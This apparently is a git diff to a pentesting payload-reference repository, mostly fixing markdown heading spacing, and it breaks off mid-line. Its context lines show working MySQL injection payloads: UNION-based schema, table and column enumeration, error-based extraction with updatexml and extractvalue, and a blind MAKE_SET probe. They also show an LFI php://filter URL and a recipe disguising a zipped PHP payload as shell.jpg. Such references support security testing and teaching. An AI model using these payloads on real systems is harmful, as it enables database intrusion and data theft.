diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index b7e4565..e0de154 100644
--- a/File Inclusion - Path Traversal/README.md
+++ b/File Inclusion - Path Traversal/README.md
@@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
 LFI Wrapper ZIP
 ```python
-echo "" > payload.php;
+echo "
" > payload.php;
 zip payload.zip payload.php;
 mv payload.zip shell.jpg;
 rm payload.php
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index 6d399f4..824bac1 100644
--- a/SQL injection/MySQL Injection.md
+++ b/SQL injection/MySQL Injection.md
@@ -1,6 +1,6 @@
 # MYSQL Injection
-##Detect columns number
+## Detect columns number
 Using a simple ORDER
 ```
 order by 1
@@ -10,7 +10,7 @@ order by 3
 order by XXX
 ```
-##MySQL Union Based
+## MySQL Union Based
 ```
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
@@ -18,13 +18,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
-##MySQL Error Based - Basic
+## MySQL Error Based - Basic
 ```
 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
-##MYSQL Error Based - UpdateXML function
+## MYSQL Error Based - UpdateXML function
 ```
 AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
 AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- 
@@ -33,7 +33,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126))
 AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
 ```
-##MYSQL Error Based - Extractvalue function
+## MYSQL Error Based - Extractvalue function
 ```
 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
@@ -42,7 +42,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
-##MYSQL Blind with MAKE_SET
+## MYSQL Blind with MAKE_SET
 ```
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
 AND MAKE_SET(YOLO